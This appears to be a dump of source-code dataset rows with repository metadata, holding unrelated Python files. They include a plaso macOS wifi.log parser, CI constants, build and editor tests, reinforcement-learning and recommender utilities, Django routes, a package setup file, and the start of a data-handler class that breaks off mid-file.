month = timelib.MONTH_DICT.get(month.lower(), 0)
if month != 0 and month < self._last_month:
# Gap detected between years.
self._year_use += 1
return self._year_use, month, day, hours, minutes, seconds, milliseconds
def _ParseLogLine(self, parser_mediator, key, structure):
"""Parse a single log line and produce an event object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
key (str): name of the parsed structure.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
time_elements_tuple = self._GetTimeElementsTuple(key, structure)
try:
date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(time_elements_tuple))
return
self._last_month = time_elements_tuple[1]
function = self._GetValueFromStructure(structure, 'function')
text = self._GetValueFromStructure(structure, 'text')
if text:
text = text.strip()
event_data = MacWifiLogEventData()
event_data.agent = self._GetValueFromStructure(structure, 'agent')
event_data.function = function
event_data.text = text
if key == 'known_function_logline':
event_data.action = self._GetAction(
event_data.function, event_data.text)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def ParseRecord(self, parser_mediator, key, structure):
"""Parses a log record structure and produces events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
key (str): name of the parsed structure.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
Raises:
ParseError: when the structure type is unknown.
"""
if key not in self._SUPPORTED_KEYS:
raise errors.ParseError(
'Unable to parse record, unknown structure: {0:s}'.format(key))
self._ParseLogLine(parser_mediator, key, structure)
def VerifyStructure(self, parser_mediator, line):
"""Verify that this file is a Mac Wifi log file.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
line (str): line from a text file.
Returns:
bool: True if the line is in the expected format, False if not.
"""
self._last_month = 0
self._year_use = parser_mediator.GetEstimatedYear()
key = 'header'
try:
structure = self._MAC_WIFI_HEADER.parseString(line)
except pyparsing.ParseException:
structure = None
if not structure:
key = 'turned_over_header'
try:
structure = self._MAC_WIFI_TURNED_OVER_HEADER.parseString(line)
except pyparsing.ParseException:
structure = None
if not structure:
logger.debug('Not a Mac Wifi log file')
return False
time_elements_tuple = self._GetTimeElementsTuple(key, structure)
try:
dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
logger.debug(
'Not a Mac Wifi log file, invalid date and time: {0!s}'.format(
time_elements_tuple))
return False
self._last_month = time_elements_tuple[1]
return True
manager.ParsersManager.RegisterParser(MacWifiLogParser)
| 33.14557 | 80 | 0.686939 | # -*- coding: utf-8 -*-
"""Parses for MacOS Wifi log (wifi.log) files."""
import re
import pyparsing
from dfdatetime import time_elements as dfdatetime_time_elements
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.lib import timelib
from plaso.parsers import logger
from plaso.parsers import manager
from plaso.parsers import text_parser
class MacWifiLogEventData(events.EventData):
"""Mac Wifi log event data.
Attributes:
action (str): known WiFI action, for example connected to an AP,
configured, etc. If the action is not known, the value is
the message of the log (text variable).
agent (str): name and identifier of process that generated the log message.
function (str): name of function that generated the log message.
text (str): log message
"""
DATA_TYPE = 'mac:wifilog:line'
def __init__(self):
"""Initializes event data."""
super(MacWifiLogEventData, self).__init__(data_type=self.DATA_TYPE)
self.action = None
self.agent = None
self.function = None
self.text = None
class MacWifiLogParser(text_parser.PyparsingSingleLineTextParser):
"""Parses MacOS Wifi log (wifi.log) files."""
NAME = 'macwifi'
DATA_FORMAT = 'MacOS Wifi log (wifi.log) file'
_ENCODING = 'utf-8'
THREE_DIGITS = text_parser.PyparsingConstants.THREE_DIGITS
THREE_LETTERS = text_parser.PyparsingConstants.THREE_LETTERS
# Regular expressions for known actions.
_CONNECTED_RE = re.compile(r'Already\sassociated\sto\s(.*)\.\sBailing')
_WIFI_PARAMETERS_RE = re.compile(
r'\[ssid=(.*?), bssid=(.*?), security=(.*?), rssi=')
_KNOWN_FUNCTIONS = [
'airportdProcessDLILEvent',
'_doAutoJoin',
'_processSystemPSKAssoc']
_AGENT = (
pyparsing.Literal('<') +
pyparsing.Combine(
pyparsing.Literal('airportd') + pyparsing.CharsNotIn('>'),
joinString='', adjacent=True).setResultsName('agent') +
pyparsing.Literal('>'))
_DATE_TIME = pyparsing.Group(
THREE_LETTERS.setResultsName('day_of_week') +
THREE_LETTERS.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME_ELEMENTS + pyparsing.Suppress('.') +
THREE_DIGITS.setResultsName('milliseconds'))
# Log line with a known function name.
_MAC_WIFI_KNOWN_FUNCTION_LINE = (
_DATE_TIME.setResultsName('date_time') + _AGENT +
pyparsing.oneOf(_KNOWN_FUNCTIONS).setResultsName('function') +
pyparsing.Literal(':') +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
# Log line with an unknown function name.
_MAC_WIFI_LINE = (
_DATE_TIME.setResultsName('date_time') + pyparsing.NotAny(
_AGENT +
pyparsing.oneOf(_KNOWN_FUNCTIONS) +
pyparsing.Literal(':')) +
pyparsing.SkipTo(pyparsing.lineEnd).setResultsName('text'))
_MAC_WIFI_HEADER = (
_DATE_TIME.setResultsName('date_time') +
pyparsing.Literal('***Starting Up***').setResultsName('text'))
_DATE_TIME_TURNED_OVER_HEADER = pyparsing.Group(
text_parser.PyparsingConstants.MONTH.setResultsName('month') +
text_parser.PyparsingConstants.ONE_OR_TWO_DIGITS.setResultsName('day') +
text_parser.PyparsingConstants.TIME_ELEMENTS)
_MAC_WIFI_TURNED_OVER_HEADER = (
_DATE_TIME_TURNED_OVER_HEADER.setResultsName('date_time') +
pyparsing.Combine(
pyparsing.Word(pyparsing.printables) +
pyparsing.Word(pyparsing.printables) +
pyparsing.Literal('logfile turned over') +
pyparsing.LineEnd(),
joinString=' ', adjacent=False).setResultsName('text'))
# Define the available log line structures.
LINE_STRUCTURES = [
('header', _MAC_WIFI_HEADER),
('turned_over_header', _MAC_WIFI_TURNED_OVER_HEADER),
('known_function_logline', _MAC_WIFI_KNOWN_FUNCTION_LINE),
('logline', _MAC_WIFI_LINE)]
_SUPPORTED_KEYS = frozenset([key for key, _ in LINE_STRUCTURES])
def __init__(self):
"""Initializes a parser."""
super(MacWifiLogParser, self).__init__()
self._last_month = 0
self._year_use = 0
def _GetAction(self, action, text):
"""Parse the well known actions for easy reading.
Args:
action (str): the function or action called by the agent.
text (str): mac Wifi log text.
Returns:
str: a formatted string representing the known (or common) action.
If the action is not known the original log text is returned.
"""
# TODO: replace "x in y" checks by startswith if possible.
if 'airportdProcessDLILEvent' in action:
interface = text.split()[0]
return 'Interface {0:s} turn up.'.format(interface)
if 'doAutoJoin' in action:
match = self._CONNECTED_RE.match(text)
if match:
ssid = match.group(1)[1:-1]
else:
ssid = 'Unknown'
return 'Wifi connected to SSID {0:s}'.format(ssid)
if 'processSystemPSKAssoc' in action:
wifi_parameters = self._WIFI_PARAMETERS_RE.search(text)
if wifi_parameters:
ssid = wifi_parameters.group(1)
bssid = wifi_parameters.group(2)
security = wifi_parameters.group(3)
if not ssid:
ssid = 'Unknown'
if not bssid:
bssid = 'Unknown'
if not security:
security = 'Unknown'
return (
'New wifi configured. BSSID: {0:s}, SSID: {1:s}, '
'Security: {2:s}.').format(bssid, ssid, security)
return text
def _GetTimeElementsTuple(self, key, structure):
"""Retrieves a time elements tuple from the structure.
Args:
key (str): name of the parsed structure.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
Returns:
tuple: containing:
year (int): year.
month (int): month, where 1 represents January.
day_of_month (int): day of month, where 1 is the first day of the month.
hours (int): hours.
minutes (int): minutes.
seconds (int): seconds.
milliseconds (int): milliseconds.
"""
time_elements_tuple = self._GetValueFromStructure(structure, 'date_time')
# TODO: what if time_elements_tuple is None.
if key == 'turned_over_header':
month, day, hours, minutes, seconds = time_elements_tuple
milliseconds = 0
else:
_, month, day, hours, minutes, seconds, milliseconds = time_elements_tuple
# Note that dfdatetime_time_elements.TimeElements will raise ValueError
# for an invalid month.
month = timelib.MONTH_DICT.get(month.lower(), 0)
if month != 0 and month < self._last_month:
# Gap detected between years.
self._year_use += 1
return self._year_use, month, day, hours, minutes, seconds, milliseconds
def _ParseLogLine(self, parser_mediator, key, structure):
"""Parse a single log line and produce an event object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
key (str): name of the parsed structure.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
"""
time_elements_tuple = self._GetTimeElementsTuple(key, structure)
try:
date_time = dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
parser_mediator.ProduceExtractionWarning(
'invalid date time value: {0!s}'.format(time_elements_tuple))
return
self._last_month = time_elements_tuple[1]
function = self._GetValueFromStructure(structure, 'function')
text = self._GetValueFromStructure(structure, 'text')
if text:
text = text.strip()
event_data = MacWifiLogEventData()
event_data.agent = self._GetValueFromStructure(structure, 'agent')
event_data.function = function
event_data.text = text
if key == 'known_function_logline':
event_data.action = self._GetAction(
event_data.function, event_data.text)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_ADDED)
parser_mediator.ProduceEventWithEventData(event, event_data)
def ParseRecord(self, parser_mediator, key, structure):
"""Parses a log record structure and produces events.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
key (str): name of the parsed structure.
structure (pyparsing.ParseResults): structure of tokens derived from
a line of a text file.
Raises:
ParseError: when the structure type is unknown.
"""
if key not in self._SUPPORTED_KEYS:
raise errors.ParseError(
'Unable to parse record, unknown structure: {0:s}'.format(key))
self._ParseLogLine(parser_mediator, key, structure)
def VerifyStructure(self, parser_mediator, line):
"""Verify that this file is a Mac Wifi log file.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
line (str): line from a text file.
Returns:
bool: True if the line is in the expected format, False if not.
"""
self._last_month = 0
self._year_use = parser_mediator.GetEstimatedYear()
key = 'header'
try:
structure = self._MAC_WIFI_HEADER.parseString(line)
except pyparsing.ParseException:
structure = None
if not structure:
key = 'turned_over_header'
try:
structure = self._MAC_WIFI_TURNED_OVER_HEADER.parseString(line)
except pyparsing.ParseException:
structure = None
if not structure:
logger.debug('Not a Mac Wifi log file')
return False
time_elements_tuple = self._GetTimeElementsTuple(key, structure)
try:
dfdatetime_time_elements.TimeElementsInMilliseconds(
time_elements_tuple=time_elements_tuple)
except ValueError:
logger.debug(
'Not a Mac Wifi log file, invalid date and time: {0!s}'.format(
time_elements_tuple))
return False
self._last_month = time_elements_tuple[1]
return True
manager.ParsersManager.RegisterParser(MacWifiLogParser)
| 0 | 0 | 0 |
eb62b09f285ab01c80232f4e0051951e202019a7 | 1,480 | py | Python | Constants.py | kimballh/WishBuilderCI | 6e5eb9c714df43d3866a6688e59dcaf8f201ef06 | [
"MIT"
] | 1 | 2018-05-18T20:33:41.000Z | 2018-05-18T20:33:41.000Z | Constants.py | kimballh/WishBuilderCI | 6e5eb9c714df43d3866a6688e59dcaf8f201ef06 | [
"MIT"
] | null | null | null | Constants.py | kimballh/WishBuilderCI | 6e5eb9c714df43d3866a6688e59dcaf8f201ef06 | [
"MIT"
] | null | null | null | MAX_NUM_PROCESSES = 4
REPO_URL = 'https://api.github.com/repos/srp33/WishBuilder/'
WB_DIRECTORY = '/app/'
SQLITE_FILE = WB_DIRECTORY + 'WishBuilderCI/history.sql'
TESTING_LOCATION = WB_DIRECTORY + 'WishBuilderCI/testing/'
RAW_DATA_STORAGE = WB_DIRECTORY + 'RawDatasets/'
GENEY_DATA_LOCATION = WB_DIRECTORY + 'GeneyDatasets/'
GENEY_CONVERTER = WB_DIRECTORY + 'GeneyTypeConverter/typeconverter.py'
MIN_TEST_CASES = 8
MIN_FEATURES = 2
MIN_SAMPLES = 2
MAX_TITLE_SIZE = 300
NUM_SAMPLE_ROWS = 5
NUM_SAMPLE_COLUMNS = 5
CHECK_MARK = '✅'
RED_X = '❌'
WARNING_SYMBOL = "<p><font color=\"orange\" size=\"+2\">⚠\t</font>"
KEY_DATA_NAME = 'test_data.tsv'
KEY_META_DATA_NAME = 'test_metadata.tsv'
TEST_DATA_NAME = 'data.tsv.gz'
TEST_META_DATA_NAME = 'metadata.tsv.gz'
DOWNLOAD_FILE_NAME = 'download.sh'
INSTALL_FILE_NAME = 'install.sh'
PARSE_FILE_NAME = 'parse.sh'
CLEANUP_FILE_NAME = 'cleanup.sh'
DESCRIPTION_FILE_NAME = 'description.md'
CONFIG_FILE_NAME = 'config.yaml'
REQUIRED_FILES = [KEY_DATA_NAME, KEY_META_DATA_NAME, DOWNLOAD_FILE_NAME, INSTALL_FILE_NAME, PARSE_FILE_NAME,
CLEANUP_FILE_NAME, DESCRIPTION_FILE_NAME, CONFIG_FILE_NAME]
REQUIRED_CONFIGS = ['title', 'featureDescription', 'featureDescriptionPlural']
# These are the executables that will be ran to produce the data and metadata files (They are executed in this order)
USER_SCRIPTS = [INSTALL_FILE_NAME, DOWNLOAD_FILE_NAME, PARSE_FILE_NAME]
KEY_FILES = [KEY_DATA_NAME, KEY_META_DATA_NAME]
| 43.529412 | 117 | 0.783108 | MAX_NUM_PROCESSES = 4
REPO_URL = 'https://api.github.com/repos/srp33/WishBuilder/'
WB_DIRECTORY = '/app/'
SQLITE_FILE = WB_DIRECTORY + 'WishBuilderCI/history.sql'
TESTING_LOCATION = WB_DIRECTORY + 'WishBuilderCI/testing/'
RAW_DATA_STORAGE = WB_DIRECTORY + 'RawDatasets/'
GENEY_DATA_LOCATION = WB_DIRECTORY + 'GeneyDatasets/'
GENEY_CONVERTER = WB_DIRECTORY + 'GeneyTypeConverter/typeconverter.py'
MIN_TEST_CASES = 8
MIN_FEATURES = 2
MIN_SAMPLES = 2
MAX_TITLE_SIZE = 300
NUM_SAMPLE_ROWS = 5
NUM_SAMPLE_COLUMNS = 5
CHECK_MARK = '✅'
RED_X = '❌'
WARNING_SYMBOL = "<p><font color=\"orange\" size=\"+2\">⚠\t</font>"
KEY_DATA_NAME = 'test_data.tsv'
KEY_META_DATA_NAME = 'test_metadata.tsv'
TEST_DATA_NAME = 'data.tsv.gz'
TEST_META_DATA_NAME = 'metadata.tsv.gz'
DOWNLOAD_FILE_NAME = 'download.sh'
INSTALL_FILE_NAME = 'install.sh'
PARSE_FILE_NAME = 'parse.sh'
CLEANUP_FILE_NAME = 'cleanup.sh'
DESCRIPTION_FILE_NAME = 'description.md'
CONFIG_FILE_NAME = 'config.yaml'
REQUIRED_FILES = [KEY_DATA_NAME, KEY_META_DATA_NAME, DOWNLOAD_FILE_NAME, INSTALL_FILE_NAME, PARSE_FILE_NAME,
CLEANUP_FILE_NAME, DESCRIPTION_FILE_NAME, CONFIG_FILE_NAME]
REQUIRED_CONFIGS = ['title', 'featureDescription', 'featureDescriptionPlural']
# These are the executables that will be ran to produce the data and metadata files (They are executed in this order)
USER_SCRIPTS = [INSTALL_FILE_NAME, DOWNLOAD_FILE_NAME, PARSE_FILE_NAME]
KEY_FILES = [KEY_DATA_NAME, KEY_META_DATA_NAME]
| 0 | 0 | 0 |
cd119f4b0406c659f619f425d188bf9b984db107 | 779 | py | Python | src/test/python/twitter/aurora/executor/test_executor_builds.py | isomer/incubator-aurora | 5f54d4de25413bb18acec16120eb18f3e08c6bf0 | [
"Apache-2.0"
] | null | null | null | src/test/python/twitter/aurora/executor/test_executor_builds.py | isomer/incubator-aurora | 5f54d4de25413bb18acec16120eb18f3e08c6bf0 | [
"Apache-2.0"
] | null | null | null | src/test/python/twitter/aurora/executor/test_executor_builds.py | isomer/incubator-aurora | 5f54d4de25413bb18acec16120eb18f3e08c6bf0 | [
"Apache-2.0"
] | null | null | null | import subprocess
| 35.409091 | 94 | 0.702182 | import subprocess
def build_and_execute_pex_target(target, binary):
assert subprocess.call(["./pants", target]) == 0
# TODO(wickman) Should we extract distdir from pants.ini?
po = subprocess.Popen([binary, "--help"], stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
so, se = po.communicate()
assert po.returncode == 1 # sigh
assert so.startswith('Options'), 'Unexpected build output: %s' % so
def test_thermos_executor_build():
build_and_execute_pex_target('src/main/python/twitter/aurora/executor/bin:thermos_executor',
'dist/thermos_executor.pex')
def test_gc_executor_build():
build_and_execute_pex_target('src/main/python/twitter/aurora/executor/bin:gc_executor',
'dist/gc_executor.pex')
| 689 | 0 | 69 |
5d4fa117effc4d8d66f7a0da2dce25e2cbedf534 | 1,140 | py | Python | rlkit/torch/her/her_twin_sac.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | 1 | 2020-10-23T14:40:09.000Z | 2020-10-23T14:40:09.000Z | rlkit/torch/her/her_twin_sac.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | null | null | null | rlkit/torch/her/her_twin_sac.py | Asap7772/railrl_evalsawyer | baba8ce634d32a48c7dfe4dc03b123e18e96e0a3 | [
"MIT"
] | 1 | 2021-05-27T20:38:45.000Z | 2021-05-27T20:38:45.000Z | import numpy as np
from rlkit.data_management.obs_dict_replay_buffer import \
ObsDictRelabelingBuffer
from rlkit.samplers.rollout_functions import (
create_rollout_function,
multitask_rollout,
)
from rlkit.torch.her.her import HER
from rlkit.torch.sac.sac import TwinSAC
| 27.142857 | 81 | 0.639474 | import numpy as np
from rlkit.data_management.obs_dict_replay_buffer import \
ObsDictRelabelingBuffer
from rlkit.samplers.rollout_functions import (
create_rollout_function,
multitask_rollout,
)
from rlkit.torch.her.her import HER
from rlkit.torch.sac.sac import TwinSAC
class HerTwinSAC(HER, TwinSAC):
def __init__(
self,
*args,
twin_sac_kwargs,
her_kwargs,
base_kwargs,
**kwargs
):
HER.__init__(
self,
**her_kwargs,
)
TwinSAC.__init__(self, *args, **kwargs, **twin_sac_kwargs, **base_kwargs)
assert isinstance(
self.replay_buffer, ObsDictRelabelingBuffer
)
@property
def eval_rollout_function(self):
return create_rollout_function(
multitask_rollout,
observation_key=self.observation_key,
desired_goal_key=self.desired_goal_key,
)
def get_epoch_snapshot(self, epoch):
snapshot = super().get_epoch_snapshot(epoch)
HerTwinSAC.update_epoch_snapshot(self, snapshot)
return snapshot
| 729 | 104 | 23 |
52c42f4215c8076d4bd4743f0cebe85276846322 | 618 | py | Python | test/test_modes/test_right_margin.py | haesleinhuepf/pyqode.core | 88b9bab081fd580d4de86f3d926a9f0b19146d28 | [
"MIT"
] | null | null | null | test/test_modes/test_right_margin.py | haesleinhuepf/pyqode.core | 88b9bab081fd580d4de86f3d926a9f0b19146d28 | [
"MIT"
] | null | null | null | test/test_modes/test_right_margin.py | haesleinhuepf/pyqode.core | 88b9bab081fd580d4de86f3d926a9f0b19146d28 | [
"MIT"
] | null | null | null | from pyqode.core import modes
from qtpy import QtGui
| 22.071429 | 62 | 0.686084 | from pyqode.core import modes
from qtpy import QtGui
def get_mode(editor):
return editor.modes.get(modes.RightMarginMode)
def test_enabled(editor):
mode = get_mode(editor)
assert mode.enabled
mode.enabled = False
mode.enabled = True
def test_position(editor):
mode = get_mode(editor)
assert mode.position == 79
mode.position = 119
assert mode.position == 119
def test_color(editor):
mode = get_mode(editor)
assert mode.color.name() == QtGui.QColor('red').name()
mode.color = QtGui.QColor('#00FF00')
assert mode.color.name() == QtGui.QColor('#00FF00').name()
| 469 | 0 | 92 |
81363f5a86cd0b541192ee2d88e9420f2a25e280 | 697 | py | Python | graphsaint/kgraphsaint/utils.py | sandl99/Simple-KGCN-GraphSAINT | bb1a9e90b785315ecb501593a0ac19e6fafc2f28 | [
"MIT"
] | null | null | null | graphsaint/kgraphsaint/utils.py | sandl99/Simple-KGCN-GraphSAINT | bb1a9e90b785315ecb501593a0ac19e6fafc2f28 | [
"MIT"
] | 1 | 2021-06-17T16:41:45.000Z | 2021-06-17T16:41:46.000Z | graphsaint/kgraphsaint/utils.py | sandl99/Simple-KGCN-GraphSAINT | bb1a9e90b785315ecb501593a0ac19e6fafc2f28 | [
"MIT"
] | null | null | null | import numpy as np
from sklearn import metrics
def reformat_train_ratings(train_data):
"""
@param train_data: data ratings for train
"""
train_data = train_data.tolist()
train_data = sorted(train_data, key=lambda key: key[1], reverse=False)
return np.array(train_data)
| 24.034483 | 74 | 0.69297 | import numpy as np
from sklearn import metrics
def build_sample(mini, args):
train_phases = {
'sampler': args.sampler,
'size_subg_edge': args.size_subg_edge
}
mini.set_sampler(train_phases)
def reformat_train_ratings(train_data):
"""
@param train_data: data ratings for train
"""
train_data = train_data.tolist()
train_data = sorted(train_data, key=lambda key: key[1], reverse=False)
return np.array(train_data)
def check_items_train(train_data, n_item):
item = set(train_data.T[1].tolist())
assert n_item == len(item)
def auc_score(pred, true, average='micro'):
return metrics.roc_auc_score(true, pred, average=average)
| 326 | 0 | 69 |
14e28362ac46998199e56ae5ac76dbf45fbbe33a | 72 | py | Python | tests/conftest.py | ashish12/django-oscar | c0651d294bd165b9c452ab0054475b145b5a435d | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | ashish12/django-oscar | c0651d294bd165b9c452ab0054475b145b5a435d | [
"BSD-3-Clause"
] | null | null | null | tests/conftest.py | ashish12/django-oscar | c0651d294bd165b9c452ab0054475b145b5a435d | [
"BSD-3-Clause"
] | null | null | null | from .config import configure
| 12 | 29 | 0.736111 | from .config import configure
def pytest_configure():
configure()
| 18 | 0 | 23 |
8b5cd81346c277def110ae0502022103ca1a5e47 | 127 | py | Python | python/testData/inspections/PyCompatibilityInspection/builtinLong.py | Sajadrahimi/intellij-community | ab9ff612dde3ee94ecae33cbc0ea639fa51550d4 | [
"Apache-2.0"
] | null | null | null | python/testData/inspections/PyCompatibilityInspection/builtinLong.py | Sajadrahimi/intellij-community | ab9ff612dde3ee94ecae33cbc0ea639fa51550d4 | [
"Apache-2.0"
] | null | null | null | python/testData/inspections/PyCompatibilityInspection/builtinLong.py | Sajadrahimi/intellij-community | ab9ff612dde3ee94ecae33cbc0ea639fa51550d4 | [
"Apache-2.0"
] | 1 | 2022-01-02T19:58:08.000Z | 2022-01-02T19:58:08.000Z | <warning descr="Python version 3.0, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6 do not have type long. Use int instead.">long("abc")</warning> | 127 | 127 | 0.653543 | <warning descr="Python version 3.0, 3.1, 3.2, 3.3, 3.4, 3.5, 3.6 do not have type long. Use int instead.">long("abc")</warning> | 0 | 0 | 0 |
d9c367e4b92d9cc182956a2b6b787706a21126fc | 125 | py | Python | test_plugin_invalid/__init__.py | PetrSixta/taro | afe0caf0e0feb6948c4cc80217b5c5d11418859b | [
"MIT"
] | null | null | null | test_plugin_invalid/__init__.py | PetrSixta/taro | afe0caf0e0feb6948c4cc80217b5c5d11418859b | [
"MIT"
] | 26 | 2021-04-05T12:32:21.000Z | 2022-03-22T12:53:44.000Z | test_plugin_invalid/__init__.py | PetrSixta/taro | afe0caf0e0feb6948c4cc80217b5c5d11418859b | [
"MIT"
] | 1 | 2021-04-16T21:04:53.000Z | 2021-04-16T21:04:53.000Z | # For testing that invalid plugin raising error doesn't break the app
raise BaseException('Must be caught in plugin module')
| 41.666667 | 69 | 0.8 | # For testing that invalid plugin raising error doesn't break the app
raise BaseException('Must be caught in plugin module')
| 0 | 0 | 0 |
ef07eb3e3ab2ff2c2ea1d88be5d20b9637e07826 | 576 | py | Python | homes_json/urls.py | Xtuden-com/django-property | 6656d469a5d06c103a34c2e68b9f1754413fb3ba | [
"MIT"
] | null | null | null | homes_json/urls.py | Xtuden-com/django-property | 6656d469a5d06c103a34c2e68b9f1754413fb3ba | [
"MIT"
] | null | null | null | homes_json/urls.py | Xtuden-com/django-property | 6656d469a5d06c103a34c2e68b9f1754413fb3ba | [
"MIT"
] | null | null | null | from django.conf.urls import url
from django.views.decorators.csrf import csrf_exempt
from .views import SearchPriceView, SearchPlacesView, ContactView, FavouriteView
urlpatterns = [
url(r'prices/(?P<type>1|2)/$', SearchPriceView.as_view(), name='search_prices'),
url(r'places/(?P<name>\w+)/$', SearchPlacesView.as_view(), name='search_places'),
url(r'contact/(?P<type>sale|letting)/$', csrf_exempt(ContactView.as_view()), name='contact'),
url(r'favourite/(?P<type>sale|letting)/(?P<slug>[-\w]+)/$', csrf_exempt(FavouriteView.as_view()), name='favourite')
]
| 48 | 119 | 0.715278 | from django.conf.urls import url
from django.views.decorators.csrf import csrf_exempt
from .views import SearchPriceView, SearchPlacesView, ContactView, FavouriteView
urlpatterns = [
url(r'prices/(?P<type>1|2)/$', SearchPriceView.as_view(), name='search_prices'),
url(r'places/(?P<name>\w+)/$', SearchPlacesView.as_view(), name='search_places'),
url(r'contact/(?P<type>sale|letting)/$', csrf_exempt(ContactView.as_view()), name='contact'),
url(r'favourite/(?P<type>sale|letting)/(?P<slug>[-\w]+)/$', csrf_exempt(FavouriteView.as_view()), name='favourite')
]
| 0 | 0 | 0 |
6377d7fb104366f4b64c4f39f4e633d2c021318a | 734 | py | Python | S4/S4 Library/simulation/objects/wind/wind_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | 1 | 2021-05-20T19:33:37.000Z | 2021-05-20T19:33:37.000Z | S4/S4 Library/simulation/objects/wind/wind_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | S4/S4 Library/simulation/objects/wind/wind_tuning.py | NeonOcean/Environment | ca658cf66e8fd6866c22a4a0136d415705b36d26 | [
"CC-BY-4.0"
] | null | null | null | from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, Tunable, TunableTuple, TunableVariant
| 146.8 | 566 | 0.668937 | from sims4.tuning.tunable import HasTunableFactory, AutoFactoryInit, Tunable, TunableTuple, TunableVariant
class WindSpeedEffect(HasTunableFactory, AutoFactoryInit):
FACTORY_TUNABLES = {'wind_speed': TunableTuple(spin_speed=TunableVariant(description='\n The spin speed level to set for the sim.\n The locked float are fixed enums on the client.\n ', locked_args={'OFF': 0.0, 'NORMAL': 3.0, 'FAST': 8.0}, default='OFF'), transition_speed=Tunable(description='\n Set the transition speed of the object.\n The transition speed defines the speed of the\n transition between spin speeds.\n ', tunable_type=float, default=1.0))}
| 0 | 604 | 23 |
dbdfd65016b0f226f51bb7625f38cf7f676fead8 | 840 | py | Python | setup.py | samuelefiorini/vrpy | ad3232b9e9ee9276c9c799d16b4a4a8c2b41eef1 | [
"MIT"
] | null | null | null | setup.py | samuelefiorini/vrpy | ad3232b9e9ee9276c9c799d16b4a4a8c2b41eef1 | [
"MIT"
] | null | null | null | setup.py | samuelefiorini/vrpy | ad3232b9e9ee9276c9c799d16b4a4a8c2b41eef1 | [
"MIT"
] | null | null | null | import setuptools
setuptools.setup(
name="vrpy",
version="0.5.0",
description="A python framework for solving vehicle routing problems",
license="MIT",
author="Romain Montagne, David Torres",
author_email="r.montagne@hotmail.fr",
keywords=["vehicle routing problem", "vrp", "column generation"],
long_description=open("README.md", "r").read(),
long_description_content_type="text/x-rst",
url="https://github.com/Kuifje02/vrpy",
packages=setuptools.find_packages(),
install_requires=["cspy", "networkx", "numpy", "pulp"],
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 35 | 74 | 0.645238 | import setuptools
setuptools.setup(
name="vrpy",
version="0.5.0",
description="A python framework for solving vehicle routing problems",
license="MIT",
author="Romain Montagne, David Torres",
author_email="r.montagne@hotmail.fr",
keywords=["vehicle routing problem", "vrp", "column generation"],
long_description=open("README.md", "r").read(),
long_description_content_type="text/x-rst",
url="https://github.com/Kuifje02/vrpy",
packages=setuptools.find_packages(),
install_requires=["cspy", "networkx", "numpy", "pulp"],
classifiers=[
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
)
| 0 | 0 | 0 |
42d3b314407e9baed2eab7f4b26ba75ae88160b7 | 8,411 | py | Python | data_handler.py | emily20270/dosenet-raspberrypi | f18ebbdb1728fc94b4c358e7b93a4751b203acd5 | [
"MIT"
] | null | null | null | data_handler.py | emily20270/dosenet-raspberrypi | f18ebbdb1728fc94b4c358e7b93a4751b203acd5 | [
"MIT"
] | null | null | null | data_handler.py | emily20270/dosenet-raspberrypi | f18ebbdb1728fc94b4c358e7b93a4751b203acd5 | [
"MIT"
] | 1 | 2018-09-13T17:35:33.000Z | 2018-09-13T17:35:33.000Z | from auxiliaries import datetime_from_epoch
from auxiliaries import set_verbosity
from globalvalues import ANSI_RESET, ANSI_YEL, ANSI_GR, ANSI_RED
from globalvalues import NETWORK_LED_BLINK_PERIOD_S
from globalvalues import DEFAULT_DATA_BACKLOG_FILE
from globalvalues import CPM_DISPLAY_TEXT
from globalvalues import strf, FLUSH_PAUSE_S
from collections import deque
import socket
import time
import ast
import os
import errno
class Data_Handler(object):
"""
Object for sending data to server.
Also handles writing to datalog and
storing to memory.
"""
def test_send(self, cpm, cpm_err):
"""
Test Mode
"""
self.vprint(
1, ANSI_RED + " * Test mode, not sending to server * " +
ANSI_RESET)
def no_config_send(self, cpm, cpm_err):
"""
Configuration file not present
"""
self.vprint(1, "Missing config file, not sending to server")
def no_publickey_send(self, cpm, cpm_err):
"""
